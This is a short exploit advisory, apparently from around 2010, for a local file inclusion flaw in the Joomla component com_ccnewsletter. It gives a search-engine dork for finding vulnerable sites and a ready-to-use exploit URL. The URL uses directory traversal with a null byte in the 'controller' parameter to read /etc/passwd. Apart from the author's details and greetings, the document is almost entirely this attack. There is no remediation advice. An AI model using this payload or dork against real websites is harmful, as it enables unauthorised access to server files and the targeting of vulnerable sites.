30 lines
No EOL
786 B
Text
30 lines
No EOL
786 B
Text
Joomla Component com_ccnewsletter Local File Inclusion
|
|
==========================================================
|
|
|
|
###########################################
|
|
.:. Author : AtT4CKxT3rR0r1ST
|
|
|
|
.:. Email : F.Hack@w.cn
|
|
|
|
.:. Home : www.sec-attack.com/vb
|
|
|
|
.:. Script : Joomla Component com_ccnewsletter
|
|
|
|
.:. Bug Type : Local File Inclusion [LFI]
|
|
|
|
.:. Dork : inurl:"com_ccnewsletter"
|
|
|
|
.:. Date : 28/1/2010
|
|
|
|
#############################################
|
|
|
|
===[ Exploit ]===
|
|
|
|
http://server/index.php?option=com_ccnewsletter&controller=[LFI]
|
|
|
|
http://server/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00
|
|
|
|
|
|
#############################################
|
|
|
|
Greats T0: My Mind & All member Sec Attack |